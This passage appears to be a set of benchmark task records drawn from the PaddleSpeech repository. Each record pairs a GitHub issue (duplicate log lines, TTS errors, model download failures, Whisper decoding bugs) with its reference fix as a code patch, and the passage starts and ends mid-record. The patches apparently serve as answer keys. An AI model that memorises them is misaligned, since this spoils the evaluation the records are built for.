+    loss3 = FocalLoss()
+    loss = loss3.forward(input, label)
+    print("FocalLoss loss: %.5f" % (loss))
+
+    Q = Q_from_tokens(100)
+    loss4 = NCELoss(Q)
+    loss = loss4.forward(input, label)
+    print("NCELoss loss: %.5f" % (loss))
```
problem_statement:
[vec] support unsupervised learning

created_at: 2022-04-20T14:41:31
---
repo: PaddlePaddle/PaddleSpeech
pull_number: 2016
instance_id: PaddlePaddle__PaddleSpeech-2016
issue_numbers: ["1969"]
base_commit: 3a05d0a2c2925b969709e314ee0075572d1c67c7
patch:
```diff
diff --git a/paddlespeech/cli/asr/infer.py b/paddlespeech/cli/asr/infer.py
--- a/paddlespeech/cli/asr/infer.py
+++ b/paddlespeech/cli/asr/infer.py
@@ -83,6 +83,12 @@ def __init__(self):
                 'attention_rescoring'
             ],
             help='only support transformer and conformer model')
+        self.parser.add_argument(
+            '--num_decoding_left_chunks',
+            '-num_left',
+            type=str,
+            default=-1,
+            help='only support transformer and conformer model')
         self.parser.add_argument(
             '--ckpt_path',
             type=str,
@@ -122,6 +128,7 @@ def _init_from_path(self,
                         sample_rate: int=16000,
                         cfg_path: Optional[os.PathLike]=None,
                         decode_method: str='attention_rescoring',
+                        num_decoding_left_chunks: int=-1,
                         ckpt_path: Optional[os.PathLike]=None):
         """
         Init model and other resources from a specific path.
@@ -129,6 +136,7 @@ def _init_from_path(self,
         logger.info("start to init the model")
         # default max_len: unit:second
         self.max_len = 50
+        assert num_decoding_left_chunks == -1 or num_decoding_left_chunks >= 0
         if hasattr(self, 'model'):
             logger.info('Model had been initialized.')
             return
@@ -179,6 +187,7 @@ def _init_from_path(self,
 
         elif "conformer" in model_type or "transformer" in model_type:
             self.config.decode.decoding_method = decode_method
+            self.config.num_decoding_left_chunks = num_decoding_left_chunks
 
         else:
             raise Exception("wrong type")
@@ -451,6 +460,7 @@ def __call__(self,
                  config: os.PathLike=None,
                  ckpt_path: os.PathLike=None,
                  decode_method: str='attention_rescoring',
+                 num_decoding_left_chunks: int=-1,
                  force_yes: bool=False,
                  rtf: bool=False,
                  device=paddle.get_device()):
@@ -460,7 +470,7 @@ def __call__(self,
         audio_file = os.path.abspath(audio_file)
         paddle.set_device(device)
         self._init_from_path(model, lang, sample_rate, config, decode_method,
-                             ckpt_path)
+                             num_decoding_left_chunks, ckpt_path)
         if not self._check(audio_file, sample_rate, force_yes):
             sys.exit(-1)
         if rtf:
diff --git a/paddlespeech/server/engine/asr/online/asr_engine.py b/paddlespeech/server/engine/asr/online/asr_engine.py
--- a/paddlespeech/server/engine/asr/online/asr_engine.py
+++ b/paddlespeech/server/engine/asr/online/asr_engine.py
@@ -703,6 +703,7 @@ def _init_from_path(self,
                         sample_rate: int=16000,
                         cfg_path: Optional[os.PathLike]=None,
                         decode_method: str='attention_rescoring',
+                        num_decoding_left_chunks: int=-1,
                         am_predictor_conf: dict=None):
         """
         Init model and other resources from a specific path.
@@ -788,7 +789,10 @@ def _init_from_path(self,
             # update the decoding method
             if decode_method:
                 self.config.decode.decoding_method = decode_method
-
+            # update num_decoding_left_chunks
+            if num_decoding_left_chunks:
+                self.config.decode.num_decoding_left_chunks = num_decoding_left_chunks
+            assert self.config.decode.num_decoding_left_chunks == -1 or self.config.decode.num_decoding_left_chunks >= 0, f"num_decoding_left_chunks should be -1 or >=0"
             # we only support ctc_prefix_beam_search and attention_rescoring dedoding method
             # Generally we set the decoding_method to attention_rescoring
             if self.config.decode.decoding_method not in [
@@ -862,6 +866,7 @@ def init(self, config: dict) -> bool:
                 sample_rate=self.config.sample_rate,
                 cfg_path=self.config.cfg_path,
                 decode_method=self.config.decode_method,
+                num_decoding_left_chunks=self.config.num_decoding_left_chunks,
                 am_predictor_conf=self.config.am_predictor_conf):
             logger.error(
                 "Init the ASR server occurs error, please check the server configuration yaml"
```
PP-ASR recognition gets slower and slower once the audio exceeds 15 seconds
The cause is that the streaming recognizer's attention currently attends to everything from the start of the utterance up to the current chunk, and attention has time complexity O(n²·d), where n is the sequence length, so decoding slows down as time goes on. We will schedule an optimization for this. You can also look at the code and truncate the input at a suitable point, since the current moment probably does not need to attend to information from very long ago.
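A minimal sketch of the truncation idea suggested above, assuming a simple NumPy cache of encoder states; the function name and shapes are illustrative, not PaddleSpeech's actual implementation (the patch above exposes this knob to users as `num_decoding_left_chunks`):

```python
import numpy as np

def trim_attention_cache(cache: np.ndarray, chunk_size: int,
                         num_left_chunks: int) -> np.ndarray:
    """Keep only the most recent history so per-chunk attention cost stays bounded.

    cache: (time, dim) array of cached encoder states from past chunks.
    """
    max_len = num_left_chunks * chunk_size
    if cache.shape[0] > max_len:
        cache = cache[-max_len:]  # drop frames too far in the past
    return cache
```

With a fixed left context, the attention cost per chunk becomes constant instead of growing with the utterance length.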
2022-06-08T02:46:43
PaddlePaddle/PaddleSpeech
2,109
PaddlePaddle__PaddleSpeech-2109
[ "2070" ]
0d91b4975ec632ff4b42ac06e2a68b7cd6aa7fd8
diff --git a/paddlespeech/server/engine/engine_factory.py b/paddlespeech/server/engine/engine_factory.py --- a/paddlespeech/server/engine/engine_factory.py +++ b/paddlespeech/server/engine/engine_factory.py @@ -13,7 +13,7 @@ # limitations under the License. from typing import Text -from ..utils.log import logger +from paddlespeech.cli.log import logger __all__ = ['EngineFactory'] diff --git a/paddlespeech/server/utils/log.py b/paddlespeech/server/utils/log.py deleted file mode 100644 --- a/paddlespeech/server/utils/log.py +++ /dev/null @@ -1,59 +0,0 @@ -# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -import functools -import logging - -__all__ = [ - 'logger', -] - - -class Logger(object): - def __init__(self, name: str=None): - name = 'PaddleSpeech' if not name else name - self.logger = logging.getLogger(name) - - log_config = { - 'DEBUG': 10, - 'INFO': 20, - 'TRAIN': 21, - 'EVAL': 22, - 'WARNING': 30, - 'ERROR': 40, - 'CRITICAL': 50, - 'EXCEPTION': 100, - } - for key, level in log_config.items(): - logging.addLevelName(level, key) - if key == 'EXCEPTION': - self.__dict__[key.lower()] = self.logger.exception - else: - self.__dict__[key.lower()] = functools.partial(self.__call__, - level) - - self.format = logging.Formatter( - fmt='[%(asctime)-15s] [%(levelname)8s] - %(message)s') - - self.handler = logging.StreamHandler() - self.handler.setFormatter(self.format) - - self.logger.addHandler(self.handler) - self.logger.setLevel(logging.DEBUG) - self.logger.propagate = False - - def __call__(self, log_level: str, msg: str): - self.logger.log(log_level, msg) - - -logger = Logger() diff --git a/paddlespeech/server/utils/onnx_infer.py b/paddlespeech/server/utils/onnx_infer.py --- a/paddlespeech/server/utils/onnx_infer.py +++ b/paddlespeech/server/utils/onnx_infer.py @@ -16,7 +16,7 @@ import onnxruntime as ort -from .log import logger +from paddlespeech.cli.log import logger def get_sess(model_path: Optional[os.PathLike]=None, sess_conf: dict=None):
The develop version of paddlespeech_server prints every log line twice after startup
```bash
paddlespeech_server start --config_file ./conf/application.yaml
```
log:
```text
[2022-06-23 06:18:31,311] [ INFO] - start to init the engine
[2022-06-23 06:18:31,311] [ INFO] - start to init the engine
[2022-06-23 06:18:31,312] [ INFO] - tts : python engine.
[2022-06-23 06:18:31,312] [ INFO] - tts : python engine.
from .pretrained_models import tts_dynamic_pretrained_models
[2022-06-23 06:18:36,330] [ INFO] - File /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4.zip md5 checking...
[2022-06-23 06:18:36,330] [ INFO] - File /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4.zip md5 checking...
[2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4
[2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4
[2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/default.yaml
[2022-06-23 06:18:37,699] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/default.yaml
[2022-06-23 06:18:37,700] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/snapshot_iter_76000.pdz
[2022-06-23 06:18:37,700] [ INFO] - /home/xxx/.paddlespeech/models/fastspeech2_csmsc-zh/1.0/fastspeech2_nosil_baker_ckpt_0.4/snapshot_iter_76000.pdz
[2022-06-23 06:18:37,700] [ INFO] - File /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4.zip md5 checking...
[2022-06-23 06:18:37,700] [ INFO] - File /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4.zip md5 checking...
[2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4
[2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4
[2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_default.yaml
[2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_default.yaml
[2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_snapshot_iter_400000.pdz
[2022-06-23 06:18:37,744] [ INFO] - /home/xxx/.paddlespeech/models/pwgan_csmsc-zh/1.0/pwg_baker_ckpt_0.4/pwg_snapshot_iter_400000.pdz
vocab_size: 268
frontend done!
```
Commit with the problem:
```text
5e03d75
```
Commit without the problem:
```text
803800
```
The commit that introduced the problem
<img width="522" alt="image" src="https://user-images.githubusercontent.com/24568452/175233071-0cf2e8fa-78e0-4497-afa9-584b4b61c3bd.png">
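For context on this class of bug, here is a tiny self-contained reproduction (illustrative, simplified from the two logger modules involved): attaching two StreamHandlers to the same named logger makes every record print twice, which is why the patch above deletes the server-side `Logger` and reuses `paddlespeech.cli.log` everywhere:

```python
import logging

logger = logging.getLogger("PaddleSpeech")
logger.addHandler(logging.StreamHandler())  # handler attached by the CLI logger module
logger.addHandler(logging.StreamHandler())  # same named logger decorated again by the server module
logger.warning("start to init the engine")  # emitted twice, once per handler
```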
2022-06-30T16:57:08
PaddlePaddle/PaddleSpeech
2,171
PaddlePaddle__PaddleSpeech-2171
[ "2170" ]
5b8673ea4b9a17a393d6f301c27a90ea4e7a33c7
diff --git a/paddlespeech/server/engine/engine_warmup.py b/paddlespeech/server/engine/engine_warmup.py --- a/paddlespeech/server/engine/engine_warmup.py +++ b/paddlespeech/server/engine/engine_warmup.py @@ -60,7 +60,10 @@ def warm_up(engine_and_type: str, warm_up_time: int=3) -> bool: else: st = time.time() - connection_handler.infer(text=sentence) + connection_handler.infer( + text=sentence, + lang=tts_engine.lang, + am=tts_engine.config.am) et = time.time() logger.debug( f"The response time of the {i} warm up: {et - st} s")
Switching to English speech synthesis fails with get_input_ids() got an unexpected keyword argument 'get_tone_ids'. To switch to English synthesis, I changed the acoustic model and vocoder under tts_python in the config file /paddlespeech/server/conf/application.yaml, using fastspeech2_ljspeech as the acoustic model and pwgan_ljspeech as the vocoder, and set lang to en, but it fails with get_input_ids() got an unexpected keyword argument 'get_tone_ids'.
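A schematic of the mismatch behind this error (class and method names are simplified placeholders, not the real PaddleSpeech classes): tone IDs only exist on the Chinese text-frontend path, so passing `get_tone_ids` into the English frontend's `get_input_ids` raises the reported TypeError. That is why the warm-up fix above forwards the engine's actual `lang` and `am` instead of always using the Chinese defaults:

```python
class ZhFrontend:
    def get_input_ids(self, text, get_tone_ids=False):  # Chinese path accepts tone ids
        return {"phone_ids": [], "tone_ids": []}

class EnFrontend:
    def get_input_ids(self, text):  # English path has no tone-id concept
        return {"phone_ids": []}

frontend = EnFrontend()  # engine configured with lang="en"
frontend.get_input_ids("hello", get_tone_ids=True)  # TypeError: unexpected keyword argument
```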
2022-07-20T01:59:40
PaddlePaddle/PaddleSpeech
2,364
PaddlePaddle__PaddleSpeech-2364
[ "2363" ]
b76bcc482efc6806852f71d8474b5c399bdbb896
diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -52,7 +52,7 @@ "Pillow>=9.0.0", "praatio==5.0.0", "protobuf>=3.1.0, <=3.20.0", - "pypinyin", + "pypinyin<=0.44.0", "pypinyin-dict", "python-dateutil", "pyworld==0.2.12",
Added pre-install doc for G2P and TN modules and updated the dependency version of pypinyin
2022-09-08T12:17:28
PaddlePaddle/PaddleSpeech
2,544
PaddlePaddle__PaddleSpeech-2544
[ "2541" ]
bf6451ed692b121d85c74b58cb16456f6183f814
diff --git a/paddlespeech/s2t/modules/attention.py b/paddlespeech/s2t/modules/attention.py --- a/paddlespeech/s2t/modules/attention.py +++ b/paddlespeech/s2t/modules/attention.py @@ -19,7 +19,6 @@ import paddle from paddle import nn -from paddle.nn import functional as F from paddle.nn import initializer as I from paddlespeech.s2t.modules.align import Linear @@ -56,16 +55,6 @@ def __init__(self, n_head: int, n_feat: int, dropout_rate: float): self.linear_out = Linear(n_feat, n_feat) self.dropout = nn.Dropout(p=dropout_rate) - def _build_once(self, *args, **kwargs): - super()._build_once(*args, **kwargs) - # if self.self_att: - # self.linear_kv = Linear(self.n_feat, self.n_feat*2) - if not self.training: - self.weight = paddle.concat( - [self.linear_k.weight, self.linear_v.weight], axis=-1) - self.bias = paddle.concat([self.linear_k.bias, self.linear_v.bias]) - self._built = True - def forward_qkv(self, query: paddle.Tensor, key: paddle.Tensor, @@ -87,13 +76,8 @@ def forward_qkv(self, n_batch = query.shape[0] q = self.linear_q(query).view(n_batch, -1, self.h, self.d_k) - if self.training: - k = self.linear_k(key).view(n_batch, -1, self.h, self.d_k) - v = self.linear_v(value).view(n_batch, -1, self.h, self.d_k) - else: - k, v = F.linear(key, self.weight, self.bias).view( - n_batch, -1, 2 * self.h, self.d_k).split( - 2, axis=2) + k = self.linear_k(key).view(n_batch, -1, self.h, self.d_k) + v = self.linear_v(value).view(n_batch, -1, self.h, self.d_k) q = q.transpose([0, 2, 1, 3]) # (batch, head, time1, d_k) k = k.transpose([0, 2, 1, 3]) # (batch, head, time2, d_k)
[S2T] ASR: multi-GPU training on the aishell dataset fails with: 'RelPositionMultiHeadedAttention' object has no attribute 'weight' **The full error message is:** ![image](https://user-images.githubusercontent.com/27938135/196336381-7bf0fb1e-5d0d-4997-bbd9-0d0a30888a7b.png) ![image](https://user-images.githubusercontent.com/27938135/196336418-203250ed-299d-4650-9ec4-b458e67edfb8.png) **My paddle version is:** ![image](https://user-images.githubusercontent.com/27938135/196336457-4ee1ebb1-6ed0-4117-80f7-410d0b67ec4b.png) **What causes this error?**
We are looking into this issue.
2022-10-18T09:08:34
PaddlePaddle/PaddleSpeech
2,549
PaddlePaddle__PaddleSpeech-2549
[ "2526" ]
eac545e1dbf7fccb5c80d3cce9ac3d2fd85d5a12
diff --git a/paddlespeech/cli/asr/infer.py b/paddlespeech/cli/asr/infer.py --- a/paddlespeech/cli/asr/infer.py +++ b/paddlespeech/cli/asr/infer.py @@ -52,7 +52,7 @@ def __init__(self): self.parser.add_argument( '--model', type=str, - default='conformer_u2pp_wenetspeech', + default='conformer_u2pp_online_wenetspeech', choices=[ tag[:tag.index('-')] for tag in self.task_resource.pretrained_models.keys() @@ -470,7 +470,7 @@ def execute(self, argv: List[str]) -> bool: @stats_wrapper def __call__(self, audio_file: os.PathLike, - model: str='conformer_u2pp_wenetspeech', + model: str='conformer_u2pp_online_wenetspeech', lang: str='zh', sample_rate: int=16000, config: os.PathLike=None, diff --git a/paddlespeech/resource/model_alias.py b/paddlespeech/resource/model_alias.py --- a/paddlespeech/resource/model_alias.py +++ b/paddlespeech/resource/model_alias.py @@ -25,7 +25,6 @@ "deepspeech2online": ["paddlespeech.s2t.models.ds2:DeepSpeech2Model"], "conformer": ["paddlespeech.s2t.models.u2:U2Model"], "conformer_online": ["paddlespeech.s2t.models.u2:U2Model"], - "conformer_u2pp": ["paddlespeech.s2t.models.u2:U2Model"], "conformer_u2pp_online": ["paddlespeech.s2t.models.u2:U2Model"], "transformer": ["paddlespeech.s2t.models.u2:U2Model"], "wenetspeech": ["paddlespeech.s2t.models.u2:U2Model"], diff --git a/paddlespeech/resource/pretrained_models.py b/paddlespeech/resource/pretrained_models.py --- a/paddlespeech/resource/pretrained_models.py +++ b/paddlespeech/resource/pretrained_models.py @@ -68,32 +68,12 @@ '', }, }, - "conformer_u2pp_wenetspeech-zh-16k": { - '1.1': { - 'url': - 'https://paddlespeech.bj.bcebos.com/s2t/wenetspeech/asr1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar.gz', - 'md5': - '662b347e1d2131b7a4dc5398365e2134', - 'cfg_path': - 'model.yaml', - 'ckpt_path': - 'exp/chunk_conformer_u2pp/checkpoints/avg_10', - 'model': - 'exp/chunk_conformer_u2pp/checkpoints/avg_10.pdparams', - 'params': - 'exp/chunk_conformer_u2pp/checkpoints/avg_10.pdparams', - 'lm_url': - '', - 'lm_md5': - '', - }, - }, "conformer_u2pp_online_wenetspeech-zh-16k": { - '1.1': { + '1.3': { 'url': - 'https://paddlespeech.bj.bcebos.com/s2t/wenetspeech/asr1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.4.model.tar.gz', + 'https://paddlespeech.bj.bcebos.com/s2t/wenetspeech/asr1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.3.0.model.tar.gz', 'md5': - '3100fc1eac5779486cab859366992d0b', + '62d230c1bf27731192aa9d3b8deca300', 'cfg_path': 'model.yaml', 'ckpt_path':
paddlespeech asr reports an error: when running paddlespeech asr --lang zh --input zh.wav, it fails because paddlespeech/models/conformer_u2pp_wenetspeech-zh-16k/1.1/asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar/model.yaml cannot be found. What is the cause of this?
Check whether this file exists in the asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar directory. We recommend updating to the latest repository code, deleting the downloaded local package, and running again. Local packages are stored under ~/.paddlespeech/models by default.
I hit the same problem: installing the pip package works fine, but running from source fails.
> Check whether this file exists in the asr1_chunk_conformer_u2pp_wenetspeech_ckpt_1.1.3.model.tar directory.

The file is indeed missing. Do I need to download a new model?
Yes, you need to download the new model.
> Yes, you need to download the new model.

I deleted it and downloaded again with the source code, but model.yaml is still missing.
[💫 Install the develop version of paddlespeech](https://github.com/PaddlePaddle/PaddleSpeech/issues/2472)
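A small helper reflecting the advice above, as a sketch: it assumes the cached package lives at the default path mentioned in the thread, and the model directory name is taken from the error message; adjust both if your setup differs.

```python
import shutil
from pathlib import Path

# Default cache location mentioned above (~/.paddlespeech/models); the model
# directory name here is an assumption based on the reported error path.
cache_dir = Path.home() / ".paddlespeech" / "models" / "conformer_u2pp_wenetspeech-zh-16k"
if cache_dir.exists():
    shutil.rmtree(cache_dir)  # force the CLI to re-download the fixed package
```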
2022-10-19T05:33:14
PaddlePaddle/PaddleSpeech
2,683
PaddlePaddle__PaddleSpeech-2683
[ "2571" ]
45426846942f68cf43a23677d8d55f6d4ab93ab1
diff --git a/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py b/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py --- a/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py +++ b/paddlespeech/t2s/frontend/zh_normalization/text_normlization.py @@ -65,7 +65,7 @@ def _split(self, text: str, lang="zh") -> List[str]: if lang == "zh": text = text.replace(" ", "") # 过滤掉特殊字符 - text = re.sub(r'[《》【】<=>{}()()#&@“”^_|…\\]', '', text) + text = re.sub(r'[——《》【】<=>{}()()#&@“”^_|…\\]', '', text) text = self.SENTENCE_SPLITOR.sub(r'\1\n', text) text = text.strip() sentences = [sentence.strip() for sentence in re.split(r'\n+', text)] @@ -85,7 +85,33 @@ def _post_replace(self, sentence: str) -> str: sentence = sentence.replace('⑧', '八') sentence = sentence.replace('⑨', '九') sentence = sentence.replace('⑩', '十') - + sentence = sentence.replace('α', '阿尔法') + sentence = sentence.replace('β', '贝塔') + sentence = sentence.replace('γ', '伽玛').replace('Γ', '伽玛') + sentence = sentence.replace('δ', '德尔塔').replace('Δ', '德尔塔') + sentence = sentence.replace('ε', '艾普西龙') + sentence = sentence.replace('ζ', '捷塔') + sentence = sentence.replace('η', '依塔') + sentence = sentence.replace('θ', '西塔').replace('Θ', '西塔') + sentence = sentence.replace('ι', '艾欧塔') + sentence = sentence.replace('κ', '喀帕') + sentence = sentence.replace('λ', '拉姆达').replace('Λ', '拉姆达') + sentence = sentence.replace('μ', '缪') + sentence = sentence.replace('ν', '拗') + sentence = sentence.replace('ξ', '克西').replace('Ξ', '克西') + sentence = sentence.replace('ο', '欧米克伦') + sentence = sentence.replace('π', '派').replace('Π', '派') + sentence = sentence.replace('ρ', '肉') + sentence = sentence.replace('ς', '西格玛').replace('Σ', '西格玛').replace( + 'σ', '西格玛') + sentence = sentence.replace('τ', '套') + sentence = sentence.replace('υ', '宇普西龙') + sentence = sentence.replace('φ', '服艾').replace('Φ', '服艾') + sentence = sentence.replace('χ', '器') + sentence = sentence.replace('ψ', '普赛').replace('Ψ', '普赛') + sentence = sentence.replace('ω', '欧米伽').replace('Ω', '欧米伽') + # re filter special characters, have one more character "-" than line 68 + sentence = re.sub(r'[-——《》【】<=>{}()()#&@“”^_|…\\]', '', sentence) return sentence def normalize_sentence(self, sentence: str) -> str: @@ -124,6 +150,5 @@ def normalize_sentence(self, sentence: str) -> str: def normalize(self, text: str) -> List[str]: sentences = self._split(text) - sentences = [self.normalize_sentence(sent) for sent in sentences] return sentences
[TTS] Special sentences and punctuation cause an error For support and discussions, please use our [Discourse forums](https://github.com/PaddlePaddle/DeepSpeech/discussions). If you've found a bug then please create an issue with the following information: **Describe the bug** A special sentence pattern causes an error **To Reproduce** Sentence that triggers the error: `并且——说来会使他惭愧——是以庄重口气谈到的,` **Expected behavior** Normal generation **Screenshots** ```shell Loading model cost 0.382 seconds. DEBUG 2022-10-22 17:58:41,857 __init__.py:164] Loading model cost 0.382 seconds. Prefix dict has been built successfully. DEBUG 2022-10-22 17:58:41,857 __init__.py:166] Prefix dict has been built successfully. [并且——说来会使他惭愧——是以庄重口气谈到的,] not in g2pW dict,use g2pM Traceback (most recent call last): File "C:\Users\ming\Desktop\1\2.py", line 28, in <module> tts(text=text, output="output.wav") File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\cli\utils.py", line 328, in _warpper return executor_func(self, *args, **kwargs) File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\cli\tts\infer.py", line 684, in __call__ self.infer(text=text, lang=lang, am=am, spk_id=spk_id) File "C:\Users\ming\envs\b-site\lib\site-packages\decorator.py", line 232, in fun return caller(func, *(extras + args), **kw) File "C:\Users\ming\envs\b-site\lib\site-packages\paddle\fluid\dygraph\base.py", line 354, in _decorate_function return func(*args, **kwargs) File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\cli\tts\infer.py", line 445, in infer frontend_dict = run_frontend( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\exps\syn_utils.py", line 195, in run_frontend input_ids = frontend.get_input_ids( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\zh_frontend.py", line 517, in get_input_ids phonemes = self.get_phonemes( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\zh_frontend.py", line 437, in get_phonemes phonemes = self._g2p( File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\zh_frontend.py", line 243, in _g2p sub_finals = self.tone_modifier.modified_tone(word, pos, File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\tone_sandhi.py", line 352, in modified_tone finals = self._neural_sandhi(word, pos, finals) File "c:\users\ming\envs\b-site\paddlespeech\paddlespeech\t2s\frontend\tone_sandhi.py", line 89, in _neural_sandhi finals[-1] = finals[-1][:-1] + "5" IndexError: list index out of range ```
Text normalization needs to filter out the special symbol `——`; PRs to fix this are welcome.
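A quick check of the filtering approach, with the character class copied from the patch above (the printed result is the behavior the fix aims for):

```python
import re

sentence = "并且——说来会使他惭愧——是以庄重口气谈到的,"
# Character class from the patch, now including the Chinese dash "——".
cleaned = re.sub(r'[——《》【】<=>{}()()#&@“”^_|…\\]', '', sentence)
print(cleaned)  # 并且说来会使他惭愧是以庄重口气谈到的,
```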
2022-11-24T12:02:28
PaddlePaddle/PaddleSpeech
2,825
PaddlePaddle__PaddleSpeech-2825
[ "2819" ]
faa2f866516e1e1afb40b25df907ebe3078bd078
diff --git a/paddlespeech/s2t/models/whisper/tokenizer.py b/paddlespeech/s2t/models/whisper/tokenizer.py --- a/paddlespeech/s2t/models/whisper/tokenizer.py +++ b/paddlespeech/s2t/models/whisper/tokenizer.py @@ -155,6 +155,10 @@ def decode(self, if ids < len(self.tokenizer): ids_list.append(ids) token_ids = ids_list + elif len(token_ids) == 1: + token_ids = token_ids[0] + else: + raise ValueError(f"token_ids {token_ids} load error.") return self.tokenizer.decode(token_ids, **kwargs) diff --git a/paddlespeech/s2t/models/whisper/whipser.py b/paddlespeech/s2t/models/whisper/whipser.py --- a/paddlespeech/s2t/models/whisper/whipser.py +++ b/paddlespeech/s2t/models/whisper/whipser.py @@ -17,12 +17,11 @@ import numpy as np import paddle import paddle.nn.functional as F +import paddlespeech.s2t.modules.align as paddlespeech_nn import soundfile import tqdm from paddle import nn from paddle.distribution import Categorical - -import paddlespeech.s2t.modules.align as paddlespeech_nn from paddlespeech.s2t.models.whisper import utils from paddlespeech.s2t.models.whisper.tokenizer import get_tokenizer from paddlespeech.s2t.models.whisper.tokenizer import LANGUAGES @@ -771,8 +770,10 @@ def update(self, if temperature == 0: next_tokens = paddle.argmax(logits, axis=-1) else: - next_tokens = Categorical(logits=logits / temperature).sample( - shape=logits.shape) + next_tokens = Categorical(logits=logits / temperature).sample([1]) + next_tokens = paddle.reshape(next_tokens, [ + next_tokens.shape[0] * next_tokens.shape[1], + ]) logprobs = F.log_softmax(logits, axis=-1, dtype=paddle.float32) current_logprobs = logprobs[paddle.arange(logprobs.shape[0]), @@ -1205,9 +1206,8 @@ def run(self, mel: paddle.Tensor) -> List[DecodingResult]: DecodingResult( audio_features=features, language=language, - language_probs=probs) - for features, language, probs in zip(audio_features, languages, - language_probs) + language_probs=probs) for features, language, probs in + zip(audio_features, languages, language_probs) ] # repeat the audio & text tensors by the group size, for beam search or best-of-n sampling
[S2T] Whisper ASR Model execution got TypeError **Describe the bug** A clear and concise description of what the bug is. ```python-traceback Traceback (most recent call last)/tmp/ipykernel_98/3684188953.py in <module> 10 audio_file=audio_file, 11 language='ja', ---> 12 device=paddle.get_device()) ~/external-libraries/paddlespeech/cli/utils.py in _warpper(self, *args, **kwargs) 326 except Exception: 327 pass --> 328 return executor_func(self, *args, **kwargs) 329 330 return _warpper ~/external-libraries/paddlespeech/cli/whisper/infer.py in __call__(self, audio_file, model, lang, task, size, language, sample_rate, config, ckpt_path, decode_method, num_decoding_left_chunks, force_yes, rtf, device) 482 483 self.preprocess(model, audio_file) --> 484 self.infer(model) 485 res = self.postprocess() # Retrieve result of asr. 486 <decorator-gen-695> in infer(self, model_type) /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddle/fluid/dygraph/base.py in _decorate_function(func, *args, **kwargs) 373 def _decorate_function(func, *args, **kwargs): 374 with self: --> 375 return func(*args, **kwargs) 376 377 @decorator.decorator ~/external-libraries/paddlespeech/cli/whisper/infer.py in infer(self, model_type) 293 initial_prompt=cfg.initial_prompt, 294 condition_on_previous_text=cfg.condition_on_previous_text, --> 295 no_speech_threshold=cfg.no_speech_threshold) 296 297 def postprocess(self) -> Union[str, os.PathLike]: ~/external-libraries/paddlespeech/s2t/models/whisper/whipser.py in transcribe(model, mel, resource_path, verbose, temperature, compression_ratio_threshold, logprob_threshold, no_speech_threshold, condition_on_previous_text, **decode_options) 623 time_precision, 624 text_tokens=sliced_tokens[1:-1], --> 625 result=result, ) 626 last_slice = current_slice 627 last_timestamp_position = ( ~/external-libraries/paddlespeech/s2t/models/whisper/whipser.py in add_segment(start, end, text_tokens, result) 552 result: DecodingResult): 553 text = tokenizer.decode( --> 554 [token for token in text_tokens if token < tokenizer.eot]) 555 if len(text.strip()) == 0: # skip empty text output 556 return ~/external-libraries/paddlespeech/s2t/models/whisper/tokenizer.py in decode(self, token_ids, **kwargs) 157 token_ids = ids_list 158 --> 159 return self.tokenizer.decode(token_ids, **kwargs) 160 161 def decode_with_timestamps(self, tokens) -> str: /opt/conda/envs/python35-paddle120-env/lib/python3.7/site-packages/paddlenlp/transformers/tokenizer_utils_base.py in decode(self, token_ids, skip_special_tokens, clean_up_tokenization_spaces, **kwargs) 3156 skip_special_tokens=skip_special_tokens, 3157 clean_up_tokenization_spaces=clean_up_tokenization_spaces, -> 3158 **kwargs, 3159 